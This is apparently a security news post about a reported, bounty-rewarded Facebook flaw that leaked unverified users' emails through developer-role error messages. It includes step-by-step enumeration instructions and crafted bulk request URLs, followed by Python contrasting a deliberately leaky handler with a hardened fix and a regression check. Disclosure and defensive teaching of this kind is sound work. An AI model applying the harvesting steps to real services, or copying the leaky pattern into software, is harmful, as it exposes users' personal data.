Another Facebook Hack Exposed!!!

Today another similar and interesting Facebook hack was disclosed by another bug hunter, Roy Castillo. On his blog he explained a new Facebook hack method that allowed anyone to easily grab the primary email addresses of billions of Facebook users.

Facebook provides an App Dashboard for creating and managing your Facebook apps, with a range of tools to help you configure, build and debug them.

The flaw exists in the App settings, where an application admin can also add a developer's profile. If that user is not a verified user, an error message on the page discloses his primary email address.

Using the following steps, one was able to grab the email addresses of all Facebook users:
  1. Collect profile links of all Facebook users from the Facebook People Directory, i.e. http://www.facebook.com/directory/people/
  2. Collect the numerical Facebook ID for each profile from the Facebook Graph API, e.g. http://graph.facebook.com/Satyamevjayte, where the extracted user ID is 1251386282
  3. Create a Facebook application -> go to Settings -> Developer Roles and try to add a developer profile. If it is a valid ID, the application will accept it; otherwise an error message will display the email address of that profile.
  4. To submit a profile ID directly via URL parameters: https://developers.facebook.com/apps/APPLICATION_ID/roles?unverified_groups[1][0]=VICTIM_UID
Where APPLICATION_ID is the application ID and VICTIM_UID is the numerical ID of a Facebook profile collected in step 2.

To submit more profiles in bulk:
https://developers.facebook.com/apps/APPLICATION_ID/roles
?unverified_groups[1][0]=VICTIM_UID1
&unverified_groups[2][0]=VICTIM_UID2
&unverified_groups[3][0]=VICTIM_UID3
&unverified_groups[4][0]=VICTIM_UID4
&unverified_groups[5][0]=VICTIM_UID5
&unverified_groups[6][0]=VICTIM_UID6
&unverified_groups[7][0]=VICTIM_UID7
&unverified_groups[8][0]=VICTIM_UID8
&unverified_groups[9][0]=VICTIM_UID9
&unverified_groups[10][0]=VICTIM_UID10
and so forth...
This way an attacker was able to dump the primary email addresses of any number of Facebook users at once. The bug was reported to the Facebook security team by Roy, and he was rewarded with $4500 under the bug bounty program.
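The root cause described above is an error message built from the looked-up user record rather than from the identifier the caller supplied. The following is an added example, not Facebook's code: a minimal model of the "add developer role" handler in the leaky form the post describes, beside a hardened form, plus a server-side handler for the bulk unverified_groups[n][0] parameters. All users, emails and the app_roles store are constructed sample data; only the UID 1251386282 is taken from the post.

```python
import re
from dataclasses import dataclass


@dataclass
class User:
    uid: int
    email: str
    verified: bool


# Constructed user store (hypothetical data for this example).
USERS = {
    1251386282: User(1251386282, "sample-a@example.com", verified=True),
    4242424242: User(4242424242, "sample-b@example.com", verified=False),
}


def add_developer_leaky(app_roles: set, uid: int) -> dict:
    """Vulnerable pattern: the error text is interpolated from the record that
    was looked up, so an unverified user's primary email is echoed back to
    whoever submitted the UID."""
    user = USERS.get(uid)
    if user is None:
        return {"ok": False, "error": f"User {uid} not found"}
    if not user.verified:
        return {"ok": False, "error": f"{user.email} is not a verified user"}  # the leak
    app_roles.add(uid)
    return {"ok": True, "error": ""}


def add_developer_hardened(app_roles: set, uid: int) -> dict:
    """Fixed pattern: the error only repeats the identifier the caller already
    had, and the same message covers "unknown" and "unverified", so the response
    reveals neither the email nor whether the UID exists."""
    user = USERS.get(uid)
    if user is None or not user.verified:
        return {"ok": False, "error": f"User {uid} cannot be added as a developer"}
    app_roles.add(uid)
    return {"ok": True, "error": ""}


_GROUP_KEY = re.compile(r"^unverified_groups\[\d+\]\[0\]$")


def handle_roles_request(params: dict, app_roles: set) -> list:
    """Server side of the bulk form shown in the post: every
    unverified_groups[n][0] value goes through the hardened check."""
    return [add_developer_hardened(app_roles, int(v))
            for k, v in params.items() if _GROUP_KEY.match(k) and v.isdigit()]


def response_leaks_email(resp: dict) -> bool:
    """Regression check: does any stored email appear in the error text?"""
    return any(u.email in resp["error"] for u in USERS.values())
```

The response_leaks_email check is the kind of assertion a test suite for this endpoint should carry, so that a later refactor of the error text cannot reintroduce the disclosure.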